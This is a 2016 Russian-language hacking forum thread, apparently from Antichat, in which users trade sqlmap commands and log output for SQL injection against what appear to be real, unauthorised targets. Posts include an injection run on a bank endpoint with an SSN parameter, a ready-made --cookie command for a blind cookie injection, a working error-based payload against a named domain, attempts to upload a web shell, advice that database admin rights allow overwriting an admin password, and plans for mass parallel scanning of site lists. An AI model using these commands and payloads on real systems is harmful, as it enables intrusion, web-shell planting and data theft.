Вопросы по SQLMap

zagruzkaaa · 25 Sep 2016

если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?

PoliGroS · 25 Sep 2016

C:\sql>python sqlmap.py -u http://site/bank --data="base=570%20and%208016%3d8016&country=&bank=&" --dbms=mysql --level 3 --risk 3 --random-agent --no-cast --threads 10 --time-sec=10
Click to expand...

И тут -

[*] starting at 21:06:23

[21:06:23] [INFO] fetched random HTTP User-Agent header from file 'C:\sql\txt\user-agents.txt': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50'
[21:06:23] [WARNING] it appears that you have provided tainted parameter values ('base=570 and 8016%3d8016') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[21:06:25] [WARNING] provided value for parameter 'country' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [WARNING] provided value for parameter 'bank' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [WARNING] provided value for parameter 'type' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://site/bank'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[21:06:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:06:31] [INFO] testing if the target URL is stable
[21:06:32] [WARNING] POST parameter 'ssn' does not appear dynamic
[21:06:33] [WARNING] heuristic (basic) test shows that POST parameter 'ssn' might not be injectable
[21:06:34] [INFO] testing for SQL injection on POST parameter 'ssn'
[21:06:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:07:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[21:08:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[21:08:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[21:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:10:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:10:48] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:11:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:12:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:13:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:13:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[21:13:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[21:13:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[21:13:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:13:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:13:27] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:13:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:13:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:14:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:14:46] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:15:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:15:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:15:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:16:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[21:16:48] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[21:17:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:17:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:17:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:17:38] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[21:17:40] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[21:17:42] [INFO] testing 'MySQL inline queries'
[21:17:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:17:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:18:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:18:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:19:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:19:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[21:19:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[21:20:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[21:20:27] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[21:20:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:21:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[21:21:34] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[21:21:59] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[21:22:23] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[21:22:47] [INFO] testing 'MySQL AND time-based blind (ELT)'
[21:23:13] [INFO] testing 'MySQL OR time-based blind (ELT)'
[21:23:38] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:24:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[21:24:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT)'
[21:24:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[21:24:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:28:55] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[21:34:25] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
it is not recommended to perform extended UNION tests if there is not at least one other (potential) technique found. Do you want to skip? [Y/n] y
[21:37:35] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[21:37:35] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[21:37:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:37:35] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[21:37:35] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
Click to expand...

Как быть дальше?

BabaDook · 26 Sep 2016

zagruzkaaa said: ↑

если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?
Click to expand...

Конечно. Главное что бы инет позволял, однако я призываю вас, всем, проводить самостоятельно эксперименты, и делится результатом с публикой.

androd · 27 Sep 2016

Есть уязвимость в с сокет,точнее blind sqlini в сокет параметре
Как сделать запрос к sqlmap что бы он начал крутить?)
GET /url HTTP/1.1
Cookie: checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=1000000000000111444833031088028731474956441558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=
X-Requested-With: XMLHttpRequest
Referer: https://site.com:443/
Host: https://site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

t0ma5 · 27 Sep 2016

androd said: ↑

Есть уязвимость в с сокет,точнее blind sqlini в сокет параметре
Как сделать запрос к sqlmap что бы он начал крутить?)
GET /url HTTP/1.1
Cookie: checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=1000000000000111444833031088028731474956441558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=
X-Requested-With: XMLHttpRequest
Referer: https://site.com:443/
Host: https://site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Click to expand...

--cookie="checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=1000000000000111444833031088028731474956441558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=" -v 3 --level 3 --risk 3 -p guest_id

zagruzkaaa · 28 Sep 2016

BabaDook said: ↑

Конечно. Главное что бы инет позволял, однако я призываю вас, всем, проводить самостоятельно эксперименты, и делится результатом с публикой.
Click to expand...

ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?

t0ma5 · 28 Sep 2016

zagruzkaaa said: ↑

если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?
Click to expand...

wtf а треды тебе на что?
Code:
~$ python sqlmap.py --help | grep threads
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
если ты действительно имел ввиду то что спрашивал, то нет, количество копий для разных сайтов не ускорит работу о_О

"ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?" узнай лимит канала своего провайдера, хотя даже 1-2мб ты запаришся забивать sqlmap'ом, скорее тебе пров атата скажет

BabaDook · 28 Sep 2016

t0ma5 said: ↑
wtf а треды тебе на что?
Code:
~$ python sqlmap.py --help | grep threads
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
если ты действительно имел ввиду то что спрашивал, то нет, количество копий для разных сайтов не ускорит работу о_О

"ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?" узнай лимит канала своего провайдера, хотя даже 1-2мб ты запаришся забивать sqlmap'ом, скорее тебе пров атата скажет
Click to expand...
не типа, смотри, запускаем одно временно сканить 2 сканеров и 20 разных сайтов, типа это будет по скорости быстрее, чем сканить с начало 1 сайт, потом второй итд...

t0ma5 · 29 Sep 2016

BabaDook said: ↑

не типа, смотри, запускаем одно временно сканить 2 сканеров и 20 разных сайтов, типа это будет по скорости быстрее, чем сканить с начало 1 сайт, потом второй итд...
Click to expand...

сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды

BabaDook · 29 Sep 2016

t0ma5 said: ↑

сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды
Click to expand...

долго объяснять свою мысль, уже флуд будет

t0ma5 · 29 Sep 2016

BabaDook said: ↑

долго объяснять свою мысль, уже флуд будет
Click to expand...

такая же фигня, забили

zagruzkaaa · 29 Sep 2016

t0ma5 said: ↑

сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды
Click to expand...

ну я имел ввиду чтобы сканеры запускать для разных сайтов) например создать отдельный список сайтов для каждого сканера

sinfo · 3 Oct 2016

Ничего не могу понять.
[21:06:50] [INFO] testing if current user is DBA
[21:06:50] [INFO] fetching current user
[21:06:50] [INFO] resumed: root@localhost
current user is DBA: True

'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE"]
Click to expand...

Пытаюсь залить шелл пишет

"[WARNING] unable to automatically parse any web server path [INFO] trying to upload the file stager on '/home/ste/public_htm l/admin-ste/' via LIMIT 'LINES TERMINATED BY' method [13:46:37] [WARNING] unable to upload the file stager on '/home/ste/public_ html/admin-ste/' [13:46:37] [INFO] trying to upload the file stager on '/windows-tools/active-dir ectory-manager/' via LIMIT 'LINES TERMINATED BY' method [13:46:39] [WARNING] unable to upload the file stager on '/windows-tools/active- directory-manager/' [13:46:39] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 8 times"]
Click to expand...

t0ma5 · 3 Oct 2016

sinfo said: ↑

Ничего не могу понять.
[21:06:50] [INFO] testing if current user is DBA
[21:06:50] [INFO] fetching current user
[21:06:50] [INFO] resumed: root@localhost
current user is DBA: True

Пытаюсь залить шелл пишет
Click to expand...

ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет

sinfo · 3 Oct 2016

t0ma5 said: ↑

ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет
Click to expand...

А с этими правами я могу перезаписать пасс админа?

BabaDook · 3 Oct 2016

sinfo said: ↑

А с этими правами я могу перезаписать пасс админа?
Click to expand...

Да. Откуда вы путь взяли? похоже что он не верный, вроде 13 ошибка говорит о том что папка недоступна для записи. Вообщем по логам понять ничего не могу.
С начало у вас
/home/ste/public_htm l/admin-ste/
Потом /windows-tools/active- directory-manager/

sinfo · 3 Oct 2016

BabaDook said: ↑

Потом /windows-tools/active- directory-manager/
Click to expand...

Это уже сам мап такое пишет

sinfo · 4 Oct 2016

--crawl=2 <- сканирование структуры сайта,Какое макс значение и есть описание допустим --crawl=1 - гет запросы --crawl=2 гет и пост и тд

masterdolicjakov · 6 Oct 2016

Доброго всем времени суток!
Парни, помогите решить одну проблемку...
В общем суть дела:
Есть сайт на ASP
Нашел мапом две скули.
Когда прошу чекнуть базу... Выползает огромный список баз в количестве около 120 штук. Хз что такое творится. Задавал пар. --current-db (user), показывало название базы и юзверя. Но вот колонки читать не хочет.
Чекаю так:
1. sqlmap.py -u site.com/site.aspx?s=104 --dbs --threads=10
2. sqlmap.py -u site.com/site.aspx?s=104 -D Base --columns --no-cast --threads=10

sinfo · 6 Oct 2016

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: http://vapenw.com:80/catalogsearch/result/?cat=-3835) OR 1 GROUP BY
CONCAT(0x716a7a7071,(SELECT (CASE WHEN (3882=3882) THEN 1 ELSE 0 END)),0x716a70
7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&product_finished=52&q=1&rating=2
---
[22:53:16] [INFO] testing MySQL
[22:53:16] [WARNING] reflective value(s) found and filtering out
[22:53:46] [WARNING] turning off pre-connect mechanism because of connection tim
e out(s)
[22:53:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to
retry the request(s)
[22:55:16] [CRITICAL] connection timed out to the target URL

пробывал с проски результата нуль(

Вопросы по SQLMap

zagruzkaaa New Member

PoliGroS Member

BabaDook Well-Known Member

androd Banned

t0ma5 Reservists Of Antichat

zagruzkaaa New Member

t0ma5 Reservists Of Antichat

BabaDook Well-Known Member

t0ma5 Reservists Of Antichat

BabaDook Well-Known Member

t0ma5 Reservists Of Antichat

zagruzkaaa New Member

sinfo Member

t0ma5 Reservists Of Antichat

sinfo Member

BabaDook Well-Known Member

sinfo Member

sinfo Member

masterdolicjakov New Member

sinfo Member

Useful Searches

Вопросы по SQLMap

zagruzkaaa New Member

PoliGroS Member

BabaDook Well-Known Member

androd Banned

t0ma5 Reservists Of Antichat

zagruzkaaa New Member

t0ma5 Reservists Of Antichat

BabaDook Well-Known Member

t0ma5 Reservists Of Antichat

BabaDook Well-Known Member

t0ma5 Reservists Of Antichat

zagruzkaaa New Member

sinfo Member

t0ma5 Reservists Of Antichat

sinfo Member

BabaDook Well-Known Member

sinfo Member

sinfo Member

masterdolicjakov New Member

sinfo Member